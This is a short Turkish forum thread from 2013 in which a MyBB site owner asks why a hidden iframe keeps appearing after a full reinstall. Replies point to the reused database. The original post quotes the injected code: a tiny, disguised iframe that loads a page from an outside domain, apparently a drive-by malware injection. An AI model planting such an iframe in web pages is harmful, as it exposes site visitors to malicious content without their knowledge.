• 11-06-2013, 13:00:17
    #1
    Merhaba,

    Site mybb bir forum sitesidir. Olayı kısaca şöyle anlatayim; FTP den tüm dosyaları komple silip yeniden en son sürüm mybb kurdum. Ancak hala iframe gözüküyor. SQL den arama yaptım yine bulamadım. Nereye eklenmiş bir türlü bulamadım. Bu konuda bana yardımcı olabilir misiniz?


    Eklenen kod:
    <iframe width="2" scrolling="auto" height="2" frameborder="no" align="middle" src="http://hecodat.de/zwmd.html?j=1501968" name="Twitter"></iframe>
  • 11-06-2013, 13:05:09
    #2
    silip aynı veritabanı üzerine mi kurdunuz? o zaman olabilir..
  • 11-06-2013, 13:23:32
    #3
    Misafir adlı üyeden alıntı: mesajı görüntüle
    silip aynı veritabanı üzerine mi kurdunuz? o zaman olabilir..
    Evet ftp den tüm dosyaları kaldırdım sonra aynı veritabanı üzerine kurdum.
  • 11-06-2013, 13:34:50
    #4
    olcaymy adlı üyeden alıntı: mesajı görüntüle
    Evet ftp den tüm dosyaları kaldırdım sonra aynı veritabanı üzerine kurdum.
    farklı veritabanına kurun..
  • 11-06-2013, 13:45:53
    #5
    Kimlik doğrulama veya yönetimden onay bekliyor.
    pm attım.